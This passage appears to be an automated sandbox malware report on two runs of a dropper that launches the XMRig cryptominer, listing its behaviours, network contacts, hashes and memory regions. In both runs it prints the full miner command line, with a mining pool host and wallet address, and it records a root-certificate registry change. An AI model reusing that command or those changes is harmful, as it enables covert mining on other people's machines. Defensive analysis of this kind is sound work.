memory/4684-42-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-43-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-44-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-45-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-46-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-47-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-48-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-49-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-50-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-51-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-52-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-53-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-54-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-55-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-56-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-57-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-58-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-59-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-60-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-61-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-62-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-63-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-64-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-65-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-66-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-67-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-68-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-69-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-70-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-71-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-72-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-73-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-74-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-75-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-76-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-77-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-78-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-79-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-80-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-81-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-82-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-83-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
memory/4684-84-0x00007FF6E5780000-0x00007FF6E6283000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4728 wrote to memory of 3384 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4728 wrote to memory of 3384 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3384-16-0x000001FB179E0000-0x000001FB17A00000-memory.dmp
memory/3384-17-0x000001FB17A30000-0x000001FB17A50000-memory.dmp
memory/3384-18-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-20-0x000001FB17A70000-0x000001FB17A90000-memory.dmp
memory/3384-19-0x000001FB17A50000-0x000001FB17A70000-memory.dmp
memory/3384-21-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-22-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-25-0x000001FB17A70000-0x000001FB17A90000-memory.dmp
memory/3384-24-0x000001FB17A50000-0x000001FB17A70000-memory.dmp
memory/3384-23-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-26-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-27-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-28-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-29-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-30-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-31-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-32-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-33-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-34-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-35-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-36-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-37-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-38-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-39-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-40-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-41-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-42-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-43-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-44-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-45-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-46-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-47-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-48-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-49-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-50-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-51-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-52-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-53-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-54-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-55-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-56-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-57-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-58-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-59-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-60-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-61-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-62-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-63-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-64-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-65-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-66-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-67-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-68-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-69-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-70-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-71-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-72-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-73-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-74-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-75-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-76-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-77-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-78-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-79-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-80-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-81-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-82-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-83-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
memory/3384-84-0x00007FF7D3C10000-0x00007FF7D4713000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1020 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4224-16-0x00000244895A0000-0x00000244895C0000-memory.dmp
memory/4224-17-0x000002451B950000-0x000002451B970000-memory.dmp
memory/4224-18-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
memory/4224-19-0x000002451BFC0000-0x000002451BFE0000-memory.dmp
memory/4224-20-0x000002451BD90000-0x000002451BDB0000-memory.dmp
memory/4224-21-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
memory/4224-22-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
memory/4224-24-0x000002451BFC0000-0x000002451BFE0000-memory.dmp
memory/4224-23-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
memory/4224-25-0x000002451BD90000-0x000002451BDB0000-memory.dmp
memory/4224-26-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
memory/4224-27-0x00007FF6F19F0000-0x00007FF6F24F3000-memory.dmp
